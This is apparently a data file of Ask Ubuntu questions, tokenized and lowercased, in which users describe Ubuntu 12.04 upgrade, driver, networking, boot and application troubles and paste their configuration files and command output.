127450	`` credentials '' error -- ubuntuone can not start	after installing ubuntu 12.04lts , i receive the following error whenever i attempt to load the ubuntuone client : credentialserror dbusexception ( dbus.string ( u' traceback ( most recent call last ) : \n file `` /usr/lib/python2.7/dist-packages/dbus/service.py '' , line 707 , in _message_cb\n retval = candidate_method ( self , *args , **keywords ) \n file `` /usr/lib/python2.7/dist-packages/ubuntuone-client/ubuntuone/platform/credentials/linux.py '' , line 185 , in find_credentials\n reply_handler=reply_handler , error_handler=error_handler ) \n file `` /usr/lib/python2.7/dist-packages/dbus/proxies.py '' , line 137 , in __call__\n **keywords ) \n file `` /usr/lib/python2.7/dist-packages/dbus/connection.py '' , line 584 , in call_async\n message.append ( signature=signature , *args ) \n valueerror : unable to guess signature from an empty dict\n ' ) , ) ubuntu one is not syncing data , and ca n't even start without crashing ( giving the report copy & pasted above ) . does anybody have any ideas as to how i can remedy this ? thank you !
127454	12.04 upgrade freezes after restart , what can i do ?	after checking battery state [ ok ] freezes want move from the right side of screen . i have and apc battery backup unit .
127456	can not upgrade to kubuntu 12.04	as you know , kubuntu 12.04 came out recently . since i want to upgrade from 11.10 , i followed the instructions on this page . however , after completing the update all packages step and rebooting , i never got a notification letting me upgrade to 12.04 . i have tried the update again many times , and i have rebooted after each upgrade , yet i have never gotten this notification . any help would be appreciated . thanks !
127457	why do my display settings say laptop when i 'm using a desktop ?	i just upgraded from 11.10 to 12.04 today . i noticed that in display settings it recognizes my system as laptop and i am actually running a desktop with a viewsonic monitor . how can i fix this ?
127458	12.04 runs my cpu up to 99 %	12.04 runs my cpu up to 99 % and then lags to the point of having to shut down the laptop to restart it manually.why is my cpu running so high and what can i do to fix it ?
127459	`` package operation failed '' when trying to install canon printer driver	i 'm totally a beginner , so i hope someone can answer this question in plain english . i 'm using ubuntu 12.04 . i have a canon lpb 2900 . i downloaded the driver as in the documentation , extracted the deb and ran it with ubuntu software center . then i got this : i tried something from the old questions of this site but they did n't work .
127466	blank screen with vnc server	on 10.04 lts i was able to run vnc4server on display :1 and get a new desktop . this was great as i could work from home without people seeing what was on my screen ( :0 was in a `` locked screen '' state ) . when replicating this on 12.04 lts i just get a blank desktop and have not been able to find out what the difference is ? anyone else experienced this , or has anybody else got a vnc setup where you can connect to a screen other than the one which is display :0 ? thanks
127477	how should one tell if it 's kubuntu or ubuntu installed ?	how can i tell if it 's ubuntu or kubuntu that is installed ? i will install chmsee on ubuntu , but kchmviewer on kubuntu .
127484	how to set up wired network ?	i have cable network connection , so plz tel me how to setup wired network in ubuntu ? i mean where to put what ip address , ip4 setting etc , thanks .
127492	how do i switch from gnome to unity after an upgrade ?	when i updated to 11.04 i changed the desktop to gnome , now with the new 12.04 i 'd like to switch back to unity . how do i do this ? thanks !
127494	google earth font problem	i installed google earth 64 bit in ubuntu 12.04 , and the fonts look ugly , no surprise there . i went through the process of installing the ttf-mscorefonts-installer , it looks better but still not right . any idea how to fix this ? i cant post a image how the fonts look like now , unfortunately , i am a newby . i would appreciate it if someone could help me though
127498	resolv.conf does n't get set on reboot when networking is configured for static ip	i 'm experiencing what appears to be a name resolution issue in ubuntu 12.04 server edition when configuring my computer to use static ip . in /etc/network/interfaces : # the primary network interface auto eth0 iface eth0 inet static address 192.168.1.28 netmask 255.255.255.0 gateway 192.168.1.1 running $ sudo apt-get upgrade , results in a 'failed to fetch ... ' : . . . w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-backports/universe/i18n/translation-en_us something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) [ ... ] when i change my /etc/network/interfaces to : auto eth0 iface eth0 inet dhcp everything works fine . looking into /etc/resolv.conf provides some more hints . in cases where i was getting the resolving issue , resolv.conf was empty ; no nameservers were specified . then i changed to dhcp from static and restarted networking ; /etc/resolv.conf got changed to : 'nameserver 192.168.1.1 ' . switching back from dhcp to static and restarting does n't remove the nameserver entry . but when i restarted the system with static set , resolv.conf was empty . when i restart the system with dhcp set , resolv.conf has nameserver 192.168.1.1 . so , it appears that the issue is that resolve.conf is not getting written to correctly ? which package/code is responsible for writing to resolv.conf ? is there a particular package that i can take a look at open issues ? update : istream posted a good article discussing changes to resolve.conf in 12.04. http : //www.stgraber.org/2012/02/24/dns-in-ubuntu-12-04/
127501	how to reenable `` aero snap '' in unity 2d ?	i want to get back `` aero snap '' , the behavior when dragging windows to the upper ubuntu bar , they maximized automatically . i must have done something to the behavior of that thing because now i ca n't do that any more , i have to double click the window or press the maximize button .
127507	keyboard and mouse not working after upgrade	i just upgraded to 12.04 . now , i can get into the desktop but after that point nothing works including keyboard and mouse . therefore i am unable to use terminal . what do i do to get it working again ?
127508	how to include locally build python package system-wide ?	for example : i build numpy with intel mkl libraries and it 's available in python shell , but if i want to install some package from repository that depends on numpy , my build is not considered . what would be easiest way to include my python build package in ubuntu , so that packages from repository can find it , preferably without building again ?
127509	is it normal for compiz to consume 40 % of my cpu with no other programs running ?	when i have no other programs running , compiz takes up at least 40 % of my cpu . is this normal ? if it is normal , is there anyway i could make this program take a smaller percentage ?
127510	how to solve a split display using a radeon hd graphic card ?	i am trying to install a new graphics card on my system and the screen comes up flashing , with the screen split in the middle . the left edge of the screen meets the right edge of the screen in the middle . any suggestions ?
127511	install gui for ubuntu server from desktop cd	i have very low internet speed in my home . i need to install gui for ubuntu server edition without the use of the internet . i have an ubuntu desktop cd . how do i do this ?
127516	upgrade from 10.04 to 12.04 still not possible even if doing `` do-release-upgrade -d ''	i am trying to update to the latest lts . my upgrade history till date is , i switched from hardy to lucid and set my upgrade schedule to lts only . after switching to lucid i installed ubuntustudio . despite running update-manager -d twice i am not able to see any updates . i did the following to debug the issue . followed the instructions here : `` no new release found '' when upgrading a from 10.04 lts to 12.04 lts i changed the upgrade schedule to normal . i installed ubuntu-desktop from synaptics the upgrade page had a link to a website recommending removal of local/obsolete packages but almost my entire installation including linux binaries show up in that list . so i am skipping it for the timebeing . i am currently downloading the iso to perform an upgrade from cd . in case that fails is there anything else that i can tryout ? the following is the result of my attempts till now sudo do-release-upgrade -d checking for a new ubuntu release no new release found my current version is cat /etc/lsb-release distrib_id=ubuntu distrib_release=10.04 distrib_codename=lucid distrib_description= '' ubuntu 10.04.4 lts '' my /etc/sources contains ( note adding spaces in the url because the spam filter does not allow me to post hyperlinks ) deb http : // archive.ubuntu.com/ubuntu lucid main universe restricted multiverse deb http : // security.ubuntu.com/ubuntu/ lucid-security universe main multiverse restricted deb-src http : // security.ubuntu.com/ubuntu/ lucid-security universe main multiverse restricted deb http : // archive.ubuntu.com/ubuntu lucid-updates universe main multiverse restricted deb-src http : // archive.ubuntu.com/ubuntu lucid-updates universe main multiverse restricted deb http : // archive.ubuntu.com/ubuntu lucid-proposed universe main multiverse restricted deb-src http : // archive.ubuntu.com/ubuntu lucid-proposed universe main multiverse restricted
127522	why are my apt-get update fetches so large ?	after clean installing 12.04 ( release candidate ) , and accepting all updates and upgrades till today , i find that sudo apt-get update invariably fetches information in the mb range , about 12 mb , whereas sudo apt-get upgrade mostly has nothing to download . the biggest three fetches i see are : http : //archive.ubuntu.com precise/universe sources [ 5,019 kb ] http : //archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] http : //archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] i 'm pretty sure the sudo apt-get update fetches were n't anywhere as large with 11.10 and rarely crossed even 1 mb . my question is this : are these large fetches just because 12.04 is recent or will these large updates be the norm ? edit : in response to mike 's answer , i 'm posting a couple of screenshots : second edit : i 'm including my present /etc/apt/sources.list . this is after i unticked the `` source code '' entry which was previously ticked in the `` other software '' image . # deb cdrom : [ ubuntu 12.04 lts _precise pangolin_ - beta i386 ( 20120421 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb-src http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe deb-src http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse deb-src http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-backports main restricted universe multiverse deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb-src http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : //archive.ubuntu.com/ubuntu precise-security universe deb-src http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse deb-src http : //archive.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main # deb-src http : //extras.ubuntu.com/ubuntu precise main third edit : for the record , lsb_release -a shows no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04 lts release : 12.04 codename : precise fourth edit ( 20120512 ) : here is the output of apt-get update i saw today : inspiron-1545 : ~ $ fast ign http : //archive.ubuntu.com precise inrelease ign http : //archive.ubuntu.com precise-updates inrelease ign http : //archive.ubuntu.com precise-security inrelease ign http : //archive.canonical.com precise inrelease ign http : //extras.ubuntu.com precise inrelease ign http : //ppa.launchpad.net precise inrelease ign http : //ppa.launchpad.net precise inrelease get:1 http : //archive.ubuntu.com precise release.gpg [ 198 b ] get:2 http : //archive.ubuntu.com precise-updates release.gpg [ 198 b ] hit http : //archive.canonical.com precise release.gpg hit http : //extras.ubuntu.com precise release.gpg hit http : //ppa.launchpad.net precise release.gpg get:3 http : //archive.ubuntu.com precise-security release.gpg [ 198 b ] get:4 http : //archive.ubuntu.com precise release [ 49.6 kb ] hit http : //archive.canonical.com precise release hit http : //extras.ubuntu.com precise release hit http : //ppa.launchpad.net precise release.gpg hit http : //archive.canonical.com precise/partner i386 packages hit http : //extras.ubuntu.com precise/main i386 packages hit http : //ppa.launchpad.net precise release get:5 http : //archive.ubuntu.com precise-updates release [ 49.6 kb ] ign http : //archive.canonical.com precise/partner translationindex ign http : //extras.ubuntu.com precise/main translationindex hit http : //ppa.launchpad.net precise release get:6 http : //archive.ubuntu.com precise-security release [ 49.6 kb ] hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex hit http : //ppa.launchpad.net precise/main i386 packages ign http : //ppa.launchpad.net precise/main translationindex ign http : //archive.canonical.com precise/partner translation-en_in ign http : //extras.ubuntu.com precise/main translation-en_in ign http : //archive.canonical.com precise/partner translation-en ign http : //extras.ubuntu.com precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_in ign http : //ppa.launchpad.net precise/main translation-en ign http : //ppa.launchpad.net precise/main translation-en_in get:7 http : //archive.ubuntu.com precise/main i386 packages [ 1,274 kb ] ign http : //ppa.launchpad.net precise/main translation-en get:8 http : //archive.ubuntu.com precise/restricted i386 packages [ 8,431 b ] get:9 http : //archive.ubuntu.com precise/universe i386 packages [ 4,796 kb ] get:10 http : //archive.ubuntu.com precise/multiverse i386 packages [ 121 kb ] hit http : //archive.ubuntu.com precise/main translationindex hit http : //archive.ubuntu.com precise/multiverse translationindex hit http : //archive.ubuntu.com precise/restricted translationindex hit http : //archive.ubuntu.com precise/universe translationindex get:11 http : //archive.ubuntu.com precise-updates/main i386 packages [ 96.5 kb ] get:12 http : //archive.ubuntu.com precise-updates/main i386 packages [ 96.5 kb ] get:13 http : //archive.ubuntu.com precise-updates/restricted i386 packages [ 770 b ] get:14 http : //archive.ubuntu.com precise-updates/universe i386 packages [ 27.7 kb ] get:15 http : //archive.ubuntu.com precise-updates/multiverse i386 packages [ 1,393 b ] hit http : //archive.ubuntu.com precise-updates/main translationindex hit http : //archive.ubuntu.com precise-updates/multiverse translationindex hit http : //archive.ubuntu.com precise-updates/restricted translationindex hit http : //archive.ubuntu.com precise-updates/universe translationindex get:16 http : //archive.ubuntu.com precise-security/main i386 packages [ 32.9 kb ] get:17 http : //archive.ubuntu.com precise-security/restricted i386 packages [ 14 b ] get:18 http : //archive.ubuntu.com precise-security/universe i386 packages [ 8,594 b ] get:19 http : //archive.ubuntu.com precise-security/multiverse i386 packages [ 1,393 b ] hit http : //archive.ubuntu.com precise-security/main translationindex hit http : //archive.ubuntu.com precise-security/multiverse translationindex hit http : //archive.ubuntu.com precise-security/restricted translationindex hit http : //archive.ubuntu.com precise-security/universe translationindex hit http : //archive.ubuntu.com precise/main translation-en hit http : //archive.ubuntu.com precise/multiverse translation-en hit http : //archive.ubuntu.com precise/restricted translation-en hit http : //archive.ubuntu.com precise/universe translation-en hit http : //archive.ubuntu.com precise-updates/main translation-en hit http : //archive.ubuntu.com precise-updates/multiverse translation-en hit http : //archive.ubuntu.com precise-updates/restricted translation-en hit http : //archive.ubuntu.com precise-updates/universe translation-en hit http : //archive.ubuntu.com precise-security/main translation-en hit http : //archive.ubuntu.com precise-security/multiverse translation-en hit http : //archive.ubuntu.com precise-security/restricted translation-en hit http : //archive.ubuntu.com precise-security/universe translation-en fetched 6,494 kb in 2min 51s ( 37.9 kb/s ) reading package lists ... done working ... no files to download . reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . -e done ! verify that all packages were installed successfully . if errors are found , run apt-get clean as root and try again using apt-get directly . ( fast in the first line is because i 'm using apt-fast instead of apt-get )
127526	not able to see '/home ' drive .	i have installed ubuntu 12.04 lts with 3 partition [ / drive for 100 gb , /home for 200 gb and /swap drive for 8 gb ] . but after successful installation i 'm not able to see /home drive . i can see only / drive.. i want to keep my data 's in /home drive [ as like d : drive in windows ] .
127528	installed ubuntu but i am not getting boot loader screen to choose between ubuntu and windows 7	this is what happened . i was using 12.04 beta . i was asked by update manager to make required updates , which i did . i shut down my pc that night and the next day i was not able to boot in xwindows or graphical interface . i tried several threads from this forum still was unsuccessful , so i decided to remove beta and do a fresh install of ubuntu 12.04 , which i did . i went in windows 7 , in disk management tool i deleted linux volume and swap volume . then when i rebooted i was stuck with a grub rescue screen . i was not able to boot in windows 7 . i went through several threads from this forum and elsewhere and learning that boot-repair ( https : //help.ubuntu.com/community/boot-repair ) was the best option . i did that . i clicked on recommended repair and wolla ! ! i got my windows 7 back . so i decided to install ubuntu 12.04 again . i did and when i rebooted i was not asked for os options and was directly taken to windows 7 . i tried this thread https : //help.ubuntu.com/community/grub2 # reinstalling_grub2 but i am still not able to go into ubuntu or get a boot loader screen . i guess my grub messed up pretty badly when i deleted linux on the first place . my boot info summary http : //paste.ubuntu.com/954260/ your kindest suggestions will be helpful .
127547	system does n't respond	i am using ubuntu 11.10 . my computer configuration is core 2 duo processor,1 gb ram,500 gb hdd . normally it works fine but when i open firefox or watch movies or copying a large file , all my system hangs for 1-2 minutes . after that the system does n't respond as smooth as it was before hanging . all i need to restart the system . is this some kind of hardware problem or there need to configure something in ubuntu ?
127551	either another instance of libreoffice is accessing your personal settings or your personal settings are locked	every time i try to open a word document in libreoffice 3.5 , i get this error : either another instance of libreoffice is accessing your personal settings or your personal settings are locked . simultaneous access can lead to inconsistencies in your personal settings . before continuing , you should make sure user ___ closes libreoffice on host ___ . i 've searched various forums in search of a remedy , but have n't found a solution . does anyone know how to resolve this ?
127552	modify dash minimize/maximize/close icons	i 'd like to be able to customize the dash minimize/maximize/close icons , specifically to be able to change the color . i 've tried several custom gtk+ and window themes ( using gnome-tweak-tool ) , some include new dash icons but i ca n't seem to locate the specific icon files to replace for setting my own icons . default theme 'ambiance ' files /usr/share/themes/ambiance/unity/close*.png would appear the files that need to be replaced , however replacing them does not change the dash icons . if not possible , i 'd settle for being able to remove them completely . anyone had any experience with this ?
127560	duplicate places in my quick list	i previously edited my quick lists for my home folder when using ubuntu 11.10 ( as described at omg ubuntu ) . i upgraded this weekend to 12.04 and now have duplicates of several folders ( downloads , videos , pictures , etc ) as quick links . i 've tried editing the home folder launcher file ( well , i just removed them ) but this was only effective until i rebooted the desktop - at which point the file was remade as before . any ideas as to how i can remove the duplicates permanently ? i tried to remove the duplicates by removing the lines with `` shortcut group '' the instructions told me to add at the bottom of /usr/share/applications/nautilus-home.desktop
127567	mouse does n't work on an hp mini netbook	i just upgraded from ubuntu 11.10 to 12.04 on an hp mini netbook , and i have quite an annoying problem : there is no mouse cursor . on the login screen , i can see the cursor , but i can not move it ( neither with the usb mouse , nor with the touchpad ) . after i login , the cursor disappears . i also installed on a virtual machine , on a different computer , and there everything works fine . does anyone else experience this ? or do you know how i could fix this ?
127569	my pc restarts with no warning ! i am using ubuntu 12.04	my pc restarts automatically , where should i look first for a solution ? thanks
127570	how do i get libreoffice extensions to work in 12.04 ?	i installed ubuntu 12.04 and am unable to run the libreoffice extensions that ran perfectly in earlier versions of libreoffice & in ubuntu 11.10 . the error message states could not create java implementation loader . please help . libreoffice 3.5.2.2 build id : 350m1 ( build:202 )
127574	chrome , firefox , chromium not loading some websites !	my computer is not loading some websites . i 've already done the following ... disabled ipv6 ... by editing the file /etc/default/grub and changing grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' ipv6.disable=1 quiet splash '' changed default dns to google public dns i have ubuntu precise 12.04 eg site . ubuntuforums.org/ update1 : it is successfully pinging ubuntuforums.org and both google dns servers ( 8.8.8.8 and 8.8.4.4-used network tools ( ubuntu default ) ! update2 : result for wget http : //ubuntuforums.org/ was as follows -- 2012-04-29 14:21:44 -- http : //ubuntuforums.org/ resolving ubuntuforums.org ( ubuntuforums.org ) ... 91.189.94.12 connecting to ubuntuforums.org ( ubuntuforums.org ) |91.189.94.12|:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `index.html.3' [ < = > ] 34,891 36.7k/s in 0.9s 2012-04-29 14:21:46 ( 36.7 kb/s ) - `index.html.3 ' saved [ 34891 ] but website not loading in any of the browsers ( google chrome , firefox and chromium ) update3 : this website 's articles not loading for eg . http : //timesofindia.indiatimes.com/tech/enterprise-it/strategy/apple-and-the-innovation-dilemma/articleshow/12911256.cms update4 : http : //ubuntuforums.org/ not loading in firefox -- safe-mode ! update5 : http : //ubuntuforums.org/ loading successfully in windows 7 but not in ubuntu 12.04 ! this means it is a problem with ubuntu 12.04 ! update6 : problem solved ! i did a clean reinstall of ubuntu 12.04 and now it is working perfect ( no problems ) !
127578	blinking cursor and black screen when trying to boot from usb	i made ubuntu 12.04 usb stick with unetbootin . when i select my usb drive in boot menu , i immediately get a black screen and blinking cursor . what causes this ?
127581	cant get past the ubuntu splash screen after upgrading to 12.04	i had being using ubuntu 11.10 in my hp core2duo vista laptop since the past six months . yesterday i upgraded to 12.04 and during upgrade got an error message of `` partial upgrade . ''today morning i booted into ubuntu and did a software update . 21 packages were updated but after reboot am permanently stuck at the ubuntu welcome screen with few dots flashing . pls help as am still new to ubuntu .
127582	how do i initialize or reset dash home settings ?	i upgraded from ubuntu 11.10 to 12.04 , and my dash home has gone blank . this is not a hardware issue , because it works fine if i run precise in the `` try '' mode from the install usb stick . i therefore presume that something in the previous settings carried into 12.04 is causing this glitch . so , if all the settings could be reinitialized the problem should hopefully go away .
127590	is it normal to have two shadow files in /etc directory ?	i am having an issue with logging in after an upgrade to 12.04 . i have been using ( unsuccessfully ) this guide to reset the password . in /etc i found two shadow files : shadow and shadow- . the files seem identical . are there supposed to be two ?
127591	epson scanner requires libjpeg version 6 -where & how can i find this ?	using ubuntu 12.04 lts release . i installed epson image scan ! and apparently there 's a known problem that does n't allow saving scans as jpeg unless a lib is installed . i quote the faq : -- -- - quote -- -- - image scan ! for linux : i can not save to jpeg faq id : ls00001 created : 2009.10.30 last modified : 2011.10.13 saving to jpeg is disabled when a compatible version of the jpeg library is not detected on your system . please install libjpeg version 6 in order to restore the ability to save to jpeg . we have confirmed that this problem occurs in the following distributions : mandriva linux 2010 mandriva linux 2010.1 mandriva linux 2011 opensuse 11.3 ubuntu 12.04 -- -- - end quote -- -- - i 've been searching the web and forums for a clue where to find this lib and how to install it without luck . i 've found and installed libjpeg-turbo ( 8 , i believe ) but this did n't enable the jpeg file format in the app ; it stays greyed out .
127593	12.04 nvidia driver makes system run really slow ... ..	hello i have tried to install nvidia drivers for my gpu from the hardware additional drivers section . i tried all that was on the list . when i reboot to make the driver active , computer logs in and then it goes really slow . sometimes it would freeze . then unfreeze so i can move my mouse . i click then have to wait a minute to get a reaction . any help yall ? thanks quality standards are killing me here .
127595	mythbuntu zooms in on every video since upgrading to 12.04	i have a computer dedicated to media playback running mythbuntu that i have upgraded to 12.04 . before , when playing high resolution and wide aspect ratio videos , they would be resized to fit the screen . so wide screen videos would be letterboxed . this is the desired behaviour . since the upgrade , any video i play back expands to fill the whole screen . it seems to zoom in to roughly the centre , though in some cases it seems to guess at top left , or something else . whatever the algorithm , all videos are zoomed in so close that they look low resolution . how do i get mythbuntu to return to the desired behaviour of showing the whole frame inside my monitor ?
127599	what compositors can i use in unity-2d ?	i would like to install a compositor in unity 2d . and i 've noticed a number of other compositors : compiz , mutter , xcompmgr , xfwm4 , etc . i 'm interested in using a lightweight compositor but i need to understand the differences between them . can someone give me guidance ?
127600	how do i get an epson stylus dx4450 - all-in-one printer/scanner working ?	i 'm ubuntu and linux newbie . http : //www.epson.co.uk/printers-and-all-in-ones/inkjet/epson-stylus-dx4450/overview ubuntu 12.04 have driver for this printer , but this driver do n't have all option . just for printing , no ink level , etc . no driver for scanner ! scanner does n't work at all . i try this driver http : //www.epson.co.uk/printers-and-all-in-ones/inkjet/epson-stylus-dx4450/drivers-support and follow install instruction , but nothing change . change operating system to windows or mac to see how much drivers are there . so , does anyone know where/how to install this scanner/printer ?
127604	how to remove tooltip message feature from all of ubuntu 12.04 desktop and user applications ?	i searched and not able to find a way to do this . i find this very annoying . after installing 12.04 , i keep getting these tooltip messages from all the applications i use . i want to remove this feature . for example , now when i move the mouse to launcher near an icon , the toolip message ( black background and white font ) comes up . i do not want this to show . i am using the default desktop after installing 12.04 ( i think this is called unity ) . here is an answer that shows how to edit a configuration file to change the message itself . but i really want to disable this feature from all applications . do i have to go edit configurations files to do this ? how can i edit tooltips for unity launcher icons here is a screen shot from my desktop showing a tooltip when using firefox . such tooltips show up in every application i open ! you can see how annoying they are and they get in the way . thanks update : i found a way to disable tooltip in firefox , using about : config and then search for the word tip and make it false . i hope that i do not have to do this for each application that i use now . it seems every application i use have tooltips enabled on ubuntu ( such as gedit , libre office software , thunderbird , etc ... ) . on windows , i did not have this problem with these applications . i noticed these tooltips on these applications only on 12.04 , that is why i thought it is a configuration feature on 12.04 . i thought there might be a global option to disable tooltips for all applications . may be there is not . but the point remains , i 'd really like to turn off these tooltips for the desktop itself . like on the launcher and other places on the desktop .
127605	update manager shows x86 virtualization solution -kernel modules for dkms	after i upgraded from ubuntu 11.10 to 12.04 . i see the `` x86 virtualization solution -kernel modules for dkms '' update available in update manager . but it does n't let me select or install it . my virtual-box is already the latest and works without any issues . how do i get rid of this update ?
127606	`` your system is running in low-graphics mode '' on an acer aspire 5552	i own a acer aspire 5552 laptop , which has ubuntu on it . and now i updated it to 12.04 lts from 11.10 . when i turn the laptop on , it says : your system is running in low-graphics mode , your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . i read about this on ask ubuntu already , and it suggested to got to ctrl + alt + f1 and reinstall my desktop , or install fglrx . well , these things what i read on this site : both of them do n't work . and if i do n't enter terminal and just click ok ( press enter , because the mouse cursor is n't there ) when it says you system is running in low- ... , i get options , but i ca n't choose any of them , ca n't even click cancel or ok. my graphics card is ati mobility radeon hd 4250 . thanks for the answer : so , i did everything you said until i had to uninstall the old drivers with the command you gave me . i entered it , and it would n't finish it . i googled and tried other things how to manually remove the old drivers on terminal , none of them worked for me . so i ca n't remove the drivers for some reason . oh , and when i enter the code you gave me , it says this : sh : 0 : ca n't open /usr/share/ati/fglrx-uninstall is there any other way i could get this fixed ? can i reinstall 12.04 on a usb or something like that ? and how would that work ? thanks : )
127608	how do i play wma files ?	since i made the upgrade to 12.04 i ca n't play wma files . i added medibuntu , install w64codecs , non-free-codecs but they do n't work . i have also installed ubuntu-restricted-extras .
127614	internet goes on and off after updating to 12.04	for some reason i have yet to understand , when i upgraded from 11.10 ( working flawlessly ) to 12.04 , internet seems not to work after a while and the only solutions are either to reboot or to disable and enable wireless . this is my network device , 02:00.0 network controller : intel corporation centrino wireless-n + wimax 6150 ( rev 67 ) i could attach some of my latest logs but i do n't know how to format that properly . this looks problematic ( i changed the mac and src just in case ) : lobato kernel : [ 9561.859976 ] wlan0 : no ipv6 routers present lobato kernel : [ 9563.341424 ] [ ufw block ] in=wlan0 out= mac=01 : xx : xx : xx : xx:01 : f4 : ec:38 : be : d6:3c:08:00 src=192.162.3.1 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 lobato kernel : [ 9564.764594 ] [ ufw block ] in=wlan0 out= mac=40 : xx : xx : xx : xx:58 : ec:55 : f9:41:08 : f7:08:00 src=192.162.3.124 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=13535 proto=2 lobato networkmanager [ 1379 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed .
127617	how to restart ubuntu upgrade from command line ?	i am trying to upgrade from 11.10 to 12.04 . after numerous hours , the upgrade finally hung on the replacing packages stage . it was showing 'replacing network adaptor ' for more than half an hour . there was no way to get any response . so eventually i powered off the machine . when i powered it back on , it boots into command line mode showing release 12.04 . how can i restart the process from the command line ?
127618	unable to drag brush tool in photoshop cs5 in 12.04	i was able to use photoshop cs5 perfectly on ubuntu 11.10 . after upgraded to 12.04 i 've noticed that when i try to use brush tool in by dragging the left mouse button i can not get continous effect on photos . it only effects the area i click with mouse . in the screenshot all the time i was holding the left mouse button but it only affected the image once , creating dots instead of lines . at first i thought its something with wine . i reinstalled it then deleted photoshop in my applicationdata folder ( windows keeps user software options in this folder ) . none of these worked . i tried on my laptop and this strange problem exists there too .
127622	iphone sync problems in ubuntu 12.04	since upgrading top 12.04 , neither rhythmbox nor banshee can detect any of the songs on my iphone3 . neither can sync with the iphone either . banshee just says `` preparing to sync '' for ever . rhythmbox claims that there is n't enough room for the files ( even if i only try to sync a playlist consisting of 1 file ) . does anyone know why this is happening / how to fix it ?
127630	ssl virtualhosts not working upon reboot , unless apache2 manually restarted	i have a few ssl virtualhosts and they work fine until i restart the box . then all of the ssl virtualhosts point to the directory listed in default-ssl . if i restart apache2 service manually everything works as intended . any ideas ?
127633	how do i get a broadcom bcm4313 wireless card working ?	i upgraded ubuntu from 11.10 to 12.04 , until which wireless was working just fine . after the upgrade and reboot , wireless is not even being detected ( when i click the network manager icon in the top panel , it does not show the wireless networks . neither the enable wireless option is there ) . but my laptop 's led indicator shows wireless is on . this is a dell vostro 3450 laptop with : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) ** ( from lspci ) . is any other info needed ? how do i get wifi working ?
127634	screen : keep programs running after shutdown	is it possible to run screen on my linux box , and resume activites after shutting down ? i am running ubuntu 12.04 with all updates installed and screen version 4.00.03jw4 installed from the ubuntu repositories . ideas are welcome .
127638	how to refresh the software sources in ubuntu software center ?	i have added a ppa repository to my fresh installation of ubuntu 12.04 with the software sources menu item in the ubuntu software center ( usc ) . the problem is that the new repository is not immediately available . i ca n't find an option to refresh the software sources in the usc . i have tried to close the usc and reopen it , but no success . i do n't know if this is a question of time ( usc needs some time to refresh ? ) , or if i 'm doing something wrong . in the meantime i had to install another software , so i have installed this one . at the end of the installation i have checked out again the software sources , and this time the new ppa repository was there . so , there is some kind of software sources refresh , but i do n't know how to force it . there is somebody else that had this issue ?
127647	why do n't custom colour settings in lxappearance affect all applications ?	in lubuntu 12.04 i have created a customised colour scheme ( using lxappearance ) which uses orange for selected items instead of blue . many applications do n't appear to use the custom colour scheme however . for example , in the system tray , xfce4-power-manager uses blue to highlight its menu selections while network manager uses orange . pcmanfm uses orange to highlight selected files in the main window but blue in its menus . is there any way to apply custom colour themes consistently ?
127651	ubuntu chrome `www.apple.com` video quality problem	i am using ubuntu 11.10 , google chrome 18 . i want to know why the video is so blurry . thanks .
127652	xubuntu : fstab mount to /media/* is not shown on desktop	i have recently changed from ubuntu to xubuntu and had always mounted my windows partition automatically to /media/windows . when i do the same thing in xubuntu , it does mount it correctly , but it does n't show the link to the partition on my desktop . i now that i could just set a link to the directory , but that 's just not suitable for me . i want to now why xfce does n't show additional automatically mounted partitions on my desktop just like in ubuntu/unity . the / system and not-auto-mounted partitions are shown as usual . fstab entry : /dev/sda3 /media/windows ntfs uid=1000 , umask=0022 0 0
